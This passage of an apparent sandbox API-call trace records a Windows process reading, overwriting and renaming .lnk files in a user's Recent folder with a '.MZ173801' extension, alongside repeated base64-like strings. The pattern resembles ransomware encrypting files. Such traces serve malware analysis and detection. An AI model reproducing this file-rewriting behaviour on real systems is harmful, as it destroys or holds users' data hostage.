lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0109.695] GetCurrentThreadId () returned 0x1358 [0109.695] GetCurrentThreadId () returned 0x1358 [0109.695] GetCurrentThreadId () returned 0x1358 [0109.695] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\N68wVE30d.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\n68wve30d.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.695] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0109.695] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.695] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x4bf [0109.696] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.696] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x4bf, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x4bf, lpOverlapped=0x0) returned 1 [0109.696] CloseHandle (hObject=0x3f4) returned 1 [0109.696] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\N68wVE30d.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\n68wve30d.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.697] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x4bf, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x4bf, lpOverlapped=0x0) returned 1 [0109.698] CloseHandle (hObject=0x3f4) returned 1 [0109.703] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\N68wVE30d.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\n68wve30d.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\N68wVE30d.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\n68wve30d.lnk.mz173801")) returned 1 [0109.704] GetCurrentThreadId () returned 0x1358 [0109.704] GetCurrentThreadId () returned 0x1358 [0109.704] GetCurrentThreadId () returned 0x1358 [0109.704] GetCurrentThreadId () returned 0x1358 [0109.704] GetCurrentThreadId () returned 0x1358 [0109.704] GetCurrentThreadId () returned 0x1358 [0109.704] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea126b1b, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea126b1b, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea126b1b, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x3d7, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="nPzlQpS1Oj776IOfWV7.lnk", cAlternateFileName="NPZLQP~1.LNK")) returned 1 [0109.704] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0109.704] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0109.704] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\nPzlQpS1Oj776IOfWV7.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\npzlqps1oj776iofwv7.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea126b1b, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea126b1b, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea126b1b, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x3d7)) returned 1 [0109.705] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.705] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0109.705] GetCurrentThreadId () returned 0x1358 [0109.705] GetCurrentThreadId () returned 0x1358 [0109.705] GetCurrentThreadId () returned 0x1358 [0109.706] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.706] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0109.706] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\nPzlQpS1Oj776IOfWV7.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\npzlqps1oj776iofwv7.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.706] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0109.706] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.707] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x3d7 [0109.707] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.707] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x3d7, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x3d7, lpOverlapped=0x0) returned 1 [0109.707] CloseHandle (hObject=0x3f4) returned 1 [0109.708] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\nPzlQpS1Oj776IOfWV7.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\npzlqps1oj776iofwv7.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.708] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x3d7, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x3d7, lpOverlapped=0x0) returned 1 [0109.709] CloseHandle (hObject=0x3f4) returned 1 [0109.710] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\nPzlQpS1Oj776IOfWV7.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\npzlqps1oj776iofwv7.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\nPzlQpS1Oj776IOfWV7.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\npzlqps1oj776iofwv7.lnk.mz173801")) returned 1 [0109.711] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea447fa8, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x9aa24e19, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x9aa4b20a, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x41a, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="NVV_UxLtcOyTWBX.lnk", cAlternateFileName="NVV_UX~1.LNK")) returned 1 [0109.711] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0109.711] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0109.711] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\NVV_UxLtcOyTWBX.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\nvv_uxltcoytwbx.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea447fa8, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x9aa24e19, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x9aa4b20a, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x41a)) returned 1 [0109.711] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.711] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0109.711] GetCurrentThreadId () returned 0x1358 [0109.711] GetCurrentThreadId () returned 0x1358 [0109.711] GetCurrentThreadId () returned 0x1358 [0109.712] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 